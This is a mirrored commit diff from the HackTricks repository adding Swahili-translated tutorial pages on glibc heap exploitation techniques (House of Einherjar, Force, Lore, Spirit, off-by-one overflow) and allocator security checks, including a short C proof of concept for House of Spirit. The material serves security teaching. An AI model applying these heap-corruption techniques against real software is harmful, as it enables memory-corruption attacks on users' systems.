Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 14:10:41 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/heap/heap-functions-security-checks.md'

Browse source
This commit is contained in:
Translator 2024-05-14 11:15:08 +00:00
parent fe84003670
commit 23819d0a7b
12 changed files with 528 additions and 125 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
.gitbook/assets/image (1245).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 96 KiB

BIN
.gitbook/assets/image (1246).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 99 KiB

BIN
.gitbook/assets/image (1247).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 80 KiB

6
SUMMARY.md
View file

@ -726,6 +726,12 @@
* [Use After Free](binary-exploitation/heap/use-after-free/README.md)
* [First Fit](binary-exploitation/heap/use-after-free/first-fit.md)
* [Double Free](binary-exploitation/heap/double-free.md)
* [Unlink Attack](binary-exploitation/heap/unlink-attack.md)
* [Off by one overflow](binary-exploitation/heap/off-by-one-overflow.md)
* [House of Spirit](binary-exploitation/heap/house-of-spirit.md)
* [House of Lore](binary-exploitation/heap/house-of-lore.md)
* [House of Einherjar](binary-exploitation/heap/house-of-einherjar.md)
* [House of Force](binary-exploitation/heap/house-of-force.md)
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)

26
binary-exploitation/heap/heap-functions-security-checks.md
View file

@ -10,13 +10,13 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## unlink
Kazi hii inaondoa kipande kutoka kwa orodha iliyounganishwa mara mbili. Ukaguzi wa kawaida hufanya uhakika kuwa muundo wa orodha iliyounganishwa unabaki thabiti wakati wa kuondoa vipande.
Kazi hii inaondoa kipande kutoka kwa orodha iliyounganishwa mara mbili. Ukaguzi wa kawaida hufanya uhakika muundo wa orodha iliyounganishwa unabaki thabiti wakati wa kuondoa vipande.
* **Ukaguzi wa Uthabiti**:
* Angalia ikiwa `P->fd->bk == P` na `P->bk->fd == P`.
@ -24,7 +24,7 @@ Kazi hii inaondoa kipande kutoka kwa orodha iliyounganishwa mara mbili. Ukaguzi
## \_int\_malloc
Kazi hii inahusika na kutenga kumbukumbu kutoka kwa heap. Ukaguzi hapa unahakikisha kuwa kumbukumbu haijaharibiwa wakati wa kutenga.
Kazi hii inahusika na kutenga kumbukumbu kutoka kwa heap. Ukaguzi hapa hufanya uhakika kumbukumbu haijaharibiwa wakati wa kutenga.
* **Ukaguzi wa Ukubwa wa Fastbin**:
* Wakati wa kuondoa kipande kutoka kwa fastbin, hakikisha ukubwa wa kipande uko ndani ya upeo wa fastbin.
@ -34,17 +34,17 @@ Kazi hii inahusika na kutenga kumbukumbu kutoka kwa heap. Ukaguzi hapa unahakiki
* Ujumbe wa kosa: `malloc(): smallbin double linked list corrupted`
* **Ukaguzi wa Mipaka ya Kumbukumbu ya Unsorted Bin**:
* Hakikisha ukubwa wa vipande katika unsorted bin uko ndani ya mipaka ya chini na ya juu.
* Ujumbe wa kosa: `malloc(): memory corruption`
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Skenario la Kwanza)**:
* Ujumbe wa kosa: `malloc(): memory corruption | malloc(): invalid next size (unsorted)`
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Kesi ya Kwanza)**:
* Wakati wa kuingiza kipande kilichobaki katika unsorted bin, angalia ikiwa `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`.
* Ujumbe wa kosa: `malloc(): corrupted unsorted chunks`
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Skenario la Pili)**:
* **Ukaguzi wa Uthabiti wa Unsorted Bin (Kesi ya Pili)**:
* Kama ukaguzi uliopita, lakini unachochea wakati wa kuingiza baada ya kugawanya kipande cha haraka au kidogo.
* Ujumbe wa kosa: `malloc(): corrupted unsorted chunks 2`
## \_int\_free
Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikisha kutolewa kwa kumbukumbu kwa usahihi na kuzuia uharibifu wa kumbukumbu.
Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikisha kumbukumbu inatolewa kwa usahihi na kuzuia uharibifu wa kumbukumbu.
* **Ukaguzi wa Mipaka ya Pointer**:
* Hakikisha kipande kinachofutwa hakizunguki kumbukumbu.
@ -53,9 +53,9 @@ Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikis
* Hakikisha ukubwa wa kipande kinachofutwa ni angalau `MINSIZE` au maradufu ya `MALLOC_ALIGNMENT`.
* Ujumbe wa kosa: `free(): invalid size`
* **Ukaguzi wa Ukubwa wa Fastbin**:
* Kwa vipande vya fastbin, hakikisha ukubwa wa kipande kinachofuata uko ndani ya mipaka ya chini na ya juu.
* Kwa vipande vya fastbin, hakikisha ukubwa wa kipande kifuatacho uko ndani ya mipaka ya chini na ya juu.
* Ujumbe wa kosa: `free(): invalid next size (fast)`
* **Ukaguzi wa Double Free wa Fastbin**:
* **Ukaguzi wa Kufuta Mara Mbili wa Fastbin**:
* Wakati wa kuingiza kipande katika fastbin, hakikisha kipande kichwa sio sawa na kile kinachoingizwa.
* Ujumbe wa kosa: `double free or corruption (fasttop)`
* **Ukaguzi wa Uthabiti wa Fastbin**:
@ -65,13 +65,13 @@ Kazi hii huru kumbukumbu iliyotengwa hapo awali. Ukaguzi hapa husaidia kuhakikis
* Kwa vipande visivyo vya fastbin, hakikisha kipande sio sawa na kipande cha juu.
* Ujumbe wa kosa: `double free or corruption (top)`
* **Ukaguzi wa Mipaka ya Kumbukumbu**:
* Hakikisha kipande kinachofuata kumbukumbu iko ndani ya mipaka ya uwanja.
* Hakikisha kipande kifuatacho kwa kumbukumbu iko ndani ya mipaka ya uwanja.
* Ujumbe wa kosa: `double free or corruption (out)`
* **Ukaguzi wa Biti ya Prev\_inuse**:
* Hakikisha biti ya awali-inatumika katika kipande kinachofuata imehakikishwa.
* Hakikisha biti ya awali-inatumika katika kipande kifuatacho imeandikwa.
* Ujumbe wa kosa: `double free or corruption (!prev)`
* **Ukaguzi wa Ukubwa wa Kawaida**:
* Hakikisha ukubwa wa kipande kinachofuata uko ndani ya mipaka inayofaa.
* Hakikisha ukubwa wa kipande kifuatacho uko ndani ya upeo wa halali.
* Ujumbe wa kosa: `free(): invalid next size (normal)`
* **Ukaguzi wa Uthabiti wa Unsorted Bin**:
* Wakati wa kuingiza kipande kilichounganishwa katika unsorted bin, angalia ikiwa `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`.
@ -87,6 +87,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

61
binary-exploitation/heap/house-of-einherjar.md Normal file
View file

@ -0,0 +1,61 @@
# Nyumba ya Einherjar
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
* Angalia mfano kutoka [https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c)
### Lengo
* Lengo ni kutenga kumbukumbu karibu na anwani yoyote maalum.
### Mahitaji
* Kosa la moja kwa moja juu ya kichwa cha kipande kinachofuata ili kurekebisha `prev in use`
* Kuweza kurekebisha data ya `prev_size`, ambayo ni sehemu ya kipande cha sasa (mwishoni)
* Kuvuja kwa kumbukumbu
### Shambulio
* Kipande bandia `A` kinajengwa ndani ya kipande kinachodhibitiwa na mkaidi ukionyesha na `fd` na `bk` kwa kipande cha asili ili kuepuka ulinzi
* Vipande vingine 2 (`B` na `C`) vinajengwa.
* Kwa kutumia kosa la moja kwa moja katika `B` moja, biti ya `prev in use` inasafishwa na data ya `prev_size` inaandikwa upya na tofauti kati ya mahali ambapo kipande cha `C` kinatengwa, na kipande bandia `A` kilichozalishwa awali.
* Hii `prev_size` na ukubwa wa kipande bandia `A` lazima ziwe sawa ili kuepuka ukaguzi.
* Kisha, Tcache inajazwa
* Kisha, `C` inaachiliwa ili iungane na kipande bandia `A`
* Kisha, kipande kipya `D` kinajengwa ambacho kitakuwa kuanzia kwenye kipande bandia `A` na kufunika kipande cha `B`
* Kisha, `B` inaachiliwa na `fd` yake inaandikwa upya kwa anwani ya lengo ikifanya ielekee anwani ya lengo ikidukua kipande cha `D` kinachokijumuisha.
* Kisha, malloc 2 zinafanywa kwa sababu ya pili itakuwa ikijumuisha anwani ya lengo
## Marejeo
* [https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

56
binary-exploitation/heap/house-of-force.md Normal file
View file

@ -0,0 +1,56 @@
# Nyumba ya Nguvu
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
* Mbinu hii ilifungiwa ([**hapa**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) na husababisha kosa hili: `malloc(): corrupted top size`
### Lengo
* Lengo la shambulio hili ni kuweza kutenga kipande katika anwani maalum.
### Mahitaji
* Kujaza ambayo inaruhusu kubadilisha ukubwa wa kichwa cha kipande cha juu (k.m. -1).
* Kuweza kudhibiti ukubwa wa kutengwa kwa rundo
### Shambulio
Ikiwa muhusika anataka kuwa na kipande katika anwani P, baada ya kujaza ukubwa wa kichwa cha kipande cha juu na -1, kwanza kabisa inahitajika kutengwa kwa (\&top\_chunk - P). Kumbuka kuwa kidole hiki kinaweza kuwa kabla au baada ya top\_chunk kwani ukubwa wowote utakuwa chini ya -1 (0xFFFFFFFFFFFFFFFF). Kisha, baada ya kutenga kipande hiki cha awali, kipande cha juu kitahamishwa kwenye anwani ya P iliyotaka na kipande kinachofuata kitakuwa kutoka kwenye anwani hiyo.
### Marejeo
* [https://github.com/shellphish/how2heap/tree/master](https://github.com/shellphish/how2heap/tree/master?tab=readme-ov-file)
* [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_force/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_force/)
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_force](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_force)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

61
binary-exploitation/heap/house-of-lore.md Normal file
View file

@ -0,0 +1,61 @@
# Nyumba ya Hadithi
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
* Hii haifanyi kazi
* Angalia kutoka [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/)
* Au: [https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c)
### Lengo
* Ingiza vipande bandia vidogo kwenye bakuli ndogo ili kuiruhusu kupangiwa.
### Mahitaji
* Unda vipande bandia
* Jua anwani ya kipande cha mwathirika na vipande bandia
* Uweze kurekebisha pointa za `bk` na `fd`
### Shambulio
* Kipande kidogo cha mwathirika kinapangiwa
* Mshambuliaji anazalisha vipande vya bandia viwili, na kufanya kipande cha kwanza cha bandia kiweke `fd` ikionyesha kipande halisi na `bk` ikionyesha kipande cha pili cha bandia. Pia fanya kipande cha pili cha bandia `bk` iweke kipande cha kwanza.
* Kisha, kipande kikubwa kipya kinapangiwa kuzuia kipande cha kwanza kuchanganywa kwenye kipande cha juu wakati kinapofutwa
* Kisha, kipande cha awali kinachopangiwa kufutwa na kipande cha pili cha ukubwa mkubwa kinapangiwa ili kipande kidogo kilichofutwa kipangwe kwenye bakuli ndogo.
* Kipande halisi kidogo kinarekebishwa ili pointa yake ya `bk` iweke kwenye bandia na.
* Kisha, wakati vipande 2 vya ukubwa huu vinapopangiwa wanapata kipande halisi kwanza na kisha kipande kisicho halali kinachodhibitiwa kwa njia fulani na mshambuliaji.
## Marejeo
* [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_lore/)
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_lore](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_lore)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

99
binary-exploitation/heap/house-of-spirit.md Normal file
View file

@ -0,0 +1,99 @@
# Nyumba ya Roho
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
### Kanuni
<details>
<summary>Nyumba ya Roho</summary>
```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
struct fast_chunk {
size_t prev_size;
size_t size;
struct fast_chunk *fd;
struct fast_chunk *bk;
char buf[0x20]; // chunk falls in fastbin size range
};
int main() {
struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory
void *ptr, *victim;
ptr = malloc(0x30);
printf("Original alloc address: %p\n", ptr);
printf("Main fake chunk:%p\n", &fake_chunks[0]);
printf("Second fake chunk for size: %p\n", &fake_chunks[1]);
// Passes size check of "free(): invalid size"
fake_chunks[0].size = sizeof(struct fast_chunk);
// Passes "free(): invalid next size (fast)"
fake_chunks[1].size = sizeof(struct fast_chunk);
// Attacker overwrites a pointer that is about to be 'freed'
// Point to .fd as it's the start of the content of the chunk
ptr = (void *)&fake_chunks[0].fd;
free(ptr);
victim = malloc(0x30);
printf("Victim: %p\n", victim);
return 0;
}
```
</details>
### Lengo
* Kuweza kuongeza anwani ya kiholela kwenye tcache / fast bin ili wakati wa kuita malloc itumike kwenye kipande
### Mahitaji
* Shambulio hili linahitaji mshambuliaji kuweza kuunda vipande vya uwongo vya haraka vinavyoonyesha kwa usahihi thamani ya ukubwa wake na kubadilisha kipande cha haraka cha ukubwa huo ambacho kitafutwa, ili kipande cha mshambuliaji ndicho kinachopata kwenye fast bin.
### Shambulio
* Unda kipande cha uwongo kinachopuuza ukaguzi wa usalama (utahitaji vipande vya uwongo 2)
* Kabla ya kipande kufutwa, libadilishe na kipande cha uwongo ili hicho ndicho kinachopata kwenye bin
## Marejeo
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

62
binary-exploitation/heap/off-by-one-overflow.md Normal file
View file

@ -0,0 +1,62 @@
# Kujazwa kwa kosa moja
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Kwa kupata ufikiaji wa kujaza 1B, muhusika anaweza kubadilisha habari ya awali ya metadata ya ukubwa, kuruhusu kuharibu vipande ambavyo kimsingi vinaachiliwa, hatimaye kuzalisha kipande ambacho kina kipande kingine halali.
### Mfano wa Kanuni:
* [https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c](https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c)
* Udukuzi huu haufanyi kazi tena kutokana na matumizi ya Tcaches.
* Zaidi ya hayo, ukijaribu kuitumia kwa vipande vikubwa zaidi (hivyo tcaches hazihusiki), utapata kosa: `malloc(): ukubwa usiofaa ufuatao (usioorodheshwa)`
### Lengo
* Fanya kipande kiwe kimejumuishwa ndani ya kipande kingine ili upatikanaji wa kuandika juu ya kipande cha pili kuruhusu kubadilisha kile kilichomo.
### Mahitaji
* Kujaza kosa moja ili kubadilisha habari ya awali ya metadata ya ukubwa
### Udukuzi
* Vipande 3 vya kumbukumbu (a, b, c) vinahifadhiwa moja baada ya nyingine. Kisha cha kati kinachiliwa. Cha kwanza kina kosa la kujazwa kwa kosa moja na muhusika anaitumia na 0x00 (ikiwa byte iliyotangulia ilikuwa 0x10 itafanya kipande cha kati kiashiria kuwa ni kidogo kwa 0x10 kuliko ilivyo kweli).
* Kisha, vipande vidogo 2 zaidi vinatengwa katika kipande kilicholiwa cha kati (b), hata hivyo, kwani `b + b->ukubwa` haujawahi kusasishwa kipande c kwa sababu anwani inayoelekezwa ni ndogo kuliko inavyopaswa.&#x20;
* Kisha, b1 na c vinachiliwa. Kwani `c - c->ukubwa_uliotangulia` bado inaelekeza kwa b (sasa b1), vyote viwili vinajumuishwa katika kipande kimoja. Hata hivyo, b2 bado iko ndani kati ya b1 na c.
* Hatimaye, malloc mpya inafanywa kurudisha eneo hili la kumbukumbu ambalo kimsingi litakuwa na b2, kuruhusu mmiliki wa malloc mpya kudhibiti maudhui ya b2.
Picha hii inaelezea kikamilifu udukuzi:
<figure><img src="../../.gitbook/assets/image (1247).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks">https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks</a></p></figcaption></figure>
## Marejeo
* [https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks](https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks)
<details>
